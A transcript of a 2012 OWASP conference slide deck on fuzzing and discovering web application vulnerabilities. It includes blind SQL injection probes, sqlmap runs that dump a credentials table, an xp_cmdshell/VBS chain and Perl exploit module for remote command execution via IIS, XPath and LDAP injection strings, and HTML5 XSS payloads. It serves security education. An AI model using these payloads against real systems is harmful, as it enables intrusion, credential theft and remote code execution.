• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
 

FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY

on

  • 9,037 views

 

Statistics

Views

Total Views
9,037
Views on SlideShare
9,031
Embed Views
6

Actions

Likes
2
Downloads
0
Comments
0

1 Embed 6

https://twitter.com 6

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment
  • One of the major sources of information: WSDL file

FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY Presentation Transcript

  • FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY SHREERAJ SHAH OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Who Are We? http://shreeraj.blogspot.com http://shreeraj.blogspot.com shreeraj@blueinfy.com shreeraj@blueinfy.com http://www.blueinfy.com http://www.blueinfy.com• Founder & Director – Blueinfy Solutions Pvt. Ltd. (Brief) – SecurityExposure.com• Past experience – Net Square, Chase, IBM & Foundstone• Interest – Web security research• Published research – Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc. – Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc. – Advisories - .Net, Java servers etc.• Books (Author) – Web 2.0 Security – Defending Ajax, RIA and SOA – Hacking Web Services – Web Hacking OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Well Known Fact!• 90% of sites are vulnerable to one or more vulnerabilities.• Exploitable ? – YES!• Most popular ones are – SQLi & XSS• SQLi – complete compromise of the application …• XSS – Control over browser and exploitation OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Traditional Fuzzing – Not working• Enterprise running on 2.0 wave - Portal• Technologies & Components – Dojo, Ajax, XML Services, Blog, Widgets• Scan with tools/products failed• Security issues and hacks – SQL injection over XML – Ajax driven XSS – Several XSS with Blog component – Several information leaks through JSON fuzzing – CSRF on both XML and JS-Array » HACKED » DEFENSE OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • AppSec – Past, Present …Source - OWASP OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon 5
  • Enterprise Technology Trend• 2007. Web services would rocket from $1.6 billion in 2004 to $34 billion. [IDC]• 2008. Web Services or Service-Oriented Architecture (SOA) would surge ahead.• 2009. Enterprise 2.0 in action and penetrating deeper into the corporate environment• 2010. Flex/Cloud/API era.• 2012. Mobile/HTML5 era. OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Architecture Documents News Weather Mails Bank/Trade Browser Internet RSS feeds Ajax RIA (Flash) Internet Web 2.0 StartHTML / JS / DOM Blog Database Authentication Application Infrastructure Web Services End point OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Environment Internet DMZ Trusted SOAP/JSON etc. MobileWeb 2.0 WServices E Scripted Application B Web Web Servers S Server Engine And E Web Static pages only Dynamic pages (HTML,HTM, etc.) (ASP,DHTML, PHP, Integrated R Client CGI, etc.) Framework V X I ASP.NET on C .Net Framework, E J2EE App Server, S Web Services, DB etc. Internal/Corporate OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Stack/Logic - Layers • Android • iPhone/Pad • HTML • Other 5 • Storage • Flash Mobile • AMF • WebSocket • DOM • WebSQL • • JS • Storage Flex • XHR • XAMLServer sideComponents • Silverlight • WCF Presentation Layer • NET Business Layer Client side Data Access Layer Components Authentication (Browser) Communication etc. Runtime, Platform, Operating System Components OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Browser & Mobile – Arch. Mobile HTML5 + CSS Silverlight FlashAPI (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Case study - Pageflakes OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Case study - PageflakesWidgets Web Services OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • FUZZING & DISCOVERYOWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • OWASP’s Risk Picture OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Methodology, Scan and Attacks Assets Footprinting & Discovery Config Scanning Enumeration & Crawling Code Scanning Attacks and ScanningBlack White Secure Coding Web Firewall Defense Secure Assets OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Discovery JSON XML JS-Script JS-Object JS-ArrayOWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Attack & EntryOWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • GET/POST GET /login.aspx?username=shah HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alivePOST http://example.com/cgi-bin/search.cgi HTTP/1.1Host: example.comUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; rv:1.7.3) Gecko/20040913 Firefox/0.10Accept: text/xml, application/xml, application/xhtml+xml, text/html;q=0.9, text/plain;q=0.8, image/png,*/*;q=0.5Keep-Alive: 300Referer: http://example.com/Content-Type: application/x-www-form-urlencodedContent-Length: 17search=searchtext OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • XML-RPCPOST /trade-rpc/getquote.rem HTTP/1.0TE: deflate,gzip;q=0.3Connection: TE, closeHost: xmlrpc.example.comContent-Type: text/xmlContent-Length: 161<?xml version="1.0"?><methodCall><methodName>stocks.getquote</methodName><params><param><value><string>MSFT</string></value></param></params></methodCall> OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • SOAP<?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getQuotes xmlns="http://tempuri.org/"> <compid>MSFT</compid> </getQuotes> </soap:Body> </soap:Envelope> OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • REST<?xml version="1.0"?><p:Laptops xmlns:p="http://laptops.example.com"xmlns:xl="http://www.w3.org/1999/xlink"><Laptop id="0123" xl:href="http://www.parts-depot.com/laptops/0123"/>< Laptop id="0348" xl:href="http://www.parts-depot.com laptops /0348"/>< Laptop id="0321" xl:href="http://www.parts-depot.com/ laptops /0321"/>……</p:Laptops> OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • JSONmessage = { from : "john@example.com", to : "jerry@example.com", subject : "I am fine", body : "Long message here", showsubject : function(){document.write(this.subject)}}; OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • HIDDEN DISCOVERYOWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Ajax driven siteOWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Crawling with Ruby/Watir OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Attacker’s approach• Fuzzing over HTTP• Injecting faults with various set of payload• Try to raise the exception• Exception throw message back as part of HTTP response• Scanning response for signatures• If signature found, it becomes interesting entry for exploitation OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Challenges• Technology fingerprinting• Hidden calls• Framework integration• Entry points are multiple• Traditional fuzzing will not work• Auto assessment can be challenge• Behavioral assessment with Artificial intelligence OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Old Approach• Forcing SQL errors.• Ideal for identifying database interfaces! http://192.168.7.120/details.asp?id= ‘3 select * from items where product_id = ‘3 DB OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Error – Now? – forget it• Premature SQL query termination We now have an SQL injection point. OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Blind SQL Injection• We have SQL injection point but it is not throwing any error message out as part of its response. Application is sending customized error page which is not revealing any signature by which we can deduce potential SQL flaw.• Knowing SQL injection point or loophole in web application, xp_cmdshell seems to be working. But we can’t say is it working or not since it doesn’t return any meaningful signature. This is “blind xp_cmdshell”.• Firewall don’t allow outbound traffic so can’t do ftp, tftp, ping etc from the box to the Internet by which you can confirm execution of the command on the target system.• We don’t know the actual path to webroot so can’t copy file to location which can be accessed over HTTP or HTTPS later to confirm the execution of the command.• If we know path to webroot and directory structure but can’t find execute permission on it so can’t copy cmd.exe or any other binary and execute over HTTP/HTTPS. OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Checks…• AND 1=1• DBO check http://192.168.50.50/details.aspx?id=1+AND+USER_NAME()=dbo• Wait delay call http://192.168.50.50/details.aspx?id=1;waitfor+delay+0:0:10• (SELECT+ASCII(SUBSTRING((a.loginame),1,1)) +FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115• http://www.dvds4less.net/details.aspx?id=1+AND+ (SELECT+ASCII(SUBSTRING((a.loginame),1,1)) +FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=114• http://www.dvds4less.net/details.aspx?id=1+AND+ (SELECT+ASCII(SUBSTRING((a.loginame),2,1)) +FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=97 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Running tools• SQL Map or Absinthe D:toolssqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1 sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com> [*] starting at: 18:47:58 [18:48:00] [WARNING] the remote DMBS is not MySQL [18:48:00] [WARNING] the remote DMBS is not PostgreSQL remote DBMS: Microsoft SQL Server banner: --- Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2) --- [*] shutting down at: 18:48:14 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Enumeration…D:toolssqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1 --dbs sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com>[*] starting at: 18:53:10[18:53:12] [WARNING] the remote DMBS is not MySQL[18:53:12] [WARNING] the remote DMBS is not PostgreSQLremote DBMS: Microsoft SQL Serverbanner:---Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)---available databases [9]:[*] CmdExec_example[*] Dashboard[*] catalog[*] demotrading[*] master[*] model[*] msdb[*] order[*] tempdb[*] shutting down at: 18:55:07 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Enumeration…D:toolssqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --tables -Dcatalog sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com>[*] starting at: 18:59:21[18:59:22] [WARNING] the remote DMBS is not MySQL[18:59:22] [WARNING] the remote DMBS is not PostgreSQLremote DBMS: Microsoft SQL ServerDatabase: catalog[3 tables]+--------------+| auth || dtproperties || items |+--------------+ OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Enumeration…D:toolssqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --dump -D catalog -T auth sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com>[*] starting at: 19:01:27[19:01:28] [WARNING] the remote DMBS is not MySQL[19:01:28] [WARNING] the remote DMBS is not PostgreSQLremote DBMS: Microsoft SQL ServerDatabase: catalogTable: auth[3 entries]+--------+------+---------+| access | user | pass |+--------+------+---------+| 101010 | dbo | john123 || 110011 | | great || 001011 | | loveit |+--------+------+---------+ OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Blind ExploitingSet WshShell = WScript.CreateObject("WScript.Shell")Set ObjExec = WshShell.Exec("cmd.exe /c echo %windir%")windir = ObjExec.StdOut.ReadLine()Set Root = GetObject("IIS://LocalHost/W3SVC/1/ROOT")Set Dir = Root.Create("IIsWebVirtualDir", "secret")Dir.Path = windirDir.AccessExecute = TrueDir.SetInfohttp://target/details.asp?id=1;exec+master..xp_cmdshell+’echo Set WshShell =WScript.CreateObject("WScript.Shell") > c:secret.vbs’…..…..…..http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo Dir.SetInfo>> c:secret.vbs’http://target/details.asp?id=1;exec+master..xp_cmdshell+cscript+c:secret.vbs’ OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Get the cmd.exe• Run command over HTTP/HTTPS• http://target/secret/system32/cmd.exe?+/c+set OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Running…sub Exploit {my $self = shift;my $target_host = $self->GetVar(RHOST);my $target_port = $self->GetVar(RPORT);my $path = $self->GetVar(RPATH);my $vhost = $self->GetVar(VHOST);my @url = split(/#/, $path);my @payload =("EXEC+master..xp_cmdshell+echo+Set+WshShell+=+WScript.CreateObject("WScript.Shell")>c:secret.vbs","EXEC+master..xp_cmdshell+echo+Set+Root+=+GetObject("IIS://LocalHost/W3SVC/1/ROOT")>>c:secret.vbs","EXEC+master..xp_cmdshell+echo+Set+Dir+=+Root.Create("IIsWebVirtualDir","secret")>>c:secret.vb s","EXEC+master..xp_cmdshell+echo+Dir.Path+=+"c:winntsystem32">>c:secret.vbs","EXEC+master..xp_cmdshell+echo+Dir.AccessExecute+=+True>>c:secret.vbs","EXEC+master..xp_cmdshell+echo+Dir.SetInfo>>c:secret.vbs","EXEC+master..xp_cmdshell+cscript+c:secret.vbs");$self->PrintLine("[+] Sending SQL injection payload...");for(my $count=0;$count<=6;$count++).. OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • XPATH injection• XPATH parsing standard error• XPATH is method available for XML parsing• MS SQL server provides interface and one can get table content in XML format.• Once this is fetched one can run XPATH queries and obtain results.• What if username/password parsing done on using XPATH – XPATH injection OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • XPATH injectionstring fulltext = "";string coString = "Provider=SQLOLEDB;Server=(local);database=order;User ID=sa;Password=mypass"; SqlXmlCommand co = new SqlXmlCommand(coString); co.RootTag="Credential"; co.CommandType = SqlXmlCommandType.Sql; co.CommandText = "SELECT * FROM users for xml Auto"; XmlReader xr = co.ExecuteXmlReader(); xr.MoveToContent(); fulltext = xr.ReadOuterXml(); XmlDocument doc = new XmlDocument(); doc.LoadXml(fulltext); string credential = "//users[@username="+user+" and @password="+pass+"]"; XmlNodeList xmln = doc.SelectNodes(credential); string temp; if(xmln.Count > 0) { //True } else //false OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • XPATH injectionstring credential = "//users[@username="+user+" and @password="+pass+"]";• XPATH parsing can be leveraged by passing following string or 1=1 or =‘• This will always true on the first node and user can get access as who ever is first user.Bingo! OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • LDAP Injection Resource viewer : http://www.something.com/res.cgi?type=1)(uid=*))•Notice the injection•Attacker bypasses the user id check•(S)he can view all machines now OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • SOAP – INJECTIONS & FUZZING OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Fetching Calls• Identifying services layer calls OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • Technology Identification• Location can be obtained from UDDI as well, if already published.• WSDL location [ Access Point ]http://192.168.11.2/ws/dvds4less.asmx?wsdl .asmx – indicates .Net server from MS OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • SOAP request SOAP Envelope<?xml version="1.0" encoding="utf-16"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfo xmlns="http://tempuri.org/"> <id>1</id> </getProductInfo> </soap:Body></soap:Envelope>Input to themethod Method Call OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • SOAP response SOAP Envelope<?xml version="1.0" encoding="utf-16"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfoResponse xmlns="http://tempuri.org/"> <getProductInfoResult>/(1)Finding Nemo($14.99)/</getProductInfoResult> </getProductInfoResponse> </soap:Body></soap:Envelope>Output to themethod Method response OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • HTML5 & CLIENT SIDE FUZZING OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • HTML5 – Tags/Attributes/Events• Tags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, Form control (keys)• Attributes – form, submit, autofocus, sandbox, manifest, rel etc.• Events/Objects – Navigation (_self), Editable content, Drag-Drop APIs, pushState (History) etc. 49 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • HTML5 – XSS• Blacklist and filter will get bypassed• Lot of new signatures and possible ways to execute scripts• XSS can be injected from tags and events• New attributes are available for XSS payload 50 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • XSS variants• Media tags• Examples – <video><source onerror="javascript:alert(1)“> – <video onerror="javascript:alert(1)"><source> 51 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • XSS variants• Exploiting autofocus – <input autofocus onfocus=alert(1)> – <select autofocus onfocus=alert(1)> – <textarea autofocus onfocus=alert(1)> – <keygen autofocus onfocus=alert(1)> 52 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • XSS variants• MathML issues – <math href="javascript:alert(1)">CLICKME</math> – <math> <maction actiontype="statusline#http://Blueinfy.com" xlink:href="javascript:alert(1)">CLICKME</mactio n> </math> 53 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • XSS variants• Form & Button etc. – <form id="test" /><button form="test" formaction="javascript:alert(1)">test – <form><button formaction="javascript:alert(1)">test• Etc … and more … 54 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • DOM BASED INJECTIONSOWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • DOM with HTML5OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • DOM based XSS - Messaging• It is a sleeping giant in the Ajax applications coupled with Web Messaging• Root cause – DOM is already loaded – Application is single page and DOM remains same – New information coming needs to be injected in using various DOM calls like eval() – Information is coming from untrusted sources – JSONP usage – Web Workers and callbacks OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • AJAX with HTML5 – DOM• Ajax function would be making a back-end call• Back-end would be returning JSON stream or any other and get injected in DOM• In some libraries their content type would allow them to get loaded in browser directly• In that case bypassing DOM processing… OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • APIs …• HTML5 few other APIs are interesting from security standpoint – File APIs – allows local file access and can mixed with ClickJacking and other attacks to gain client files. – Drag-Drop APIs – exploiting self XSS and few other tricks, hijacking cookies … – Lot more to explore and defend… OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
  • CONCLUSION & QUESTIONSOWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon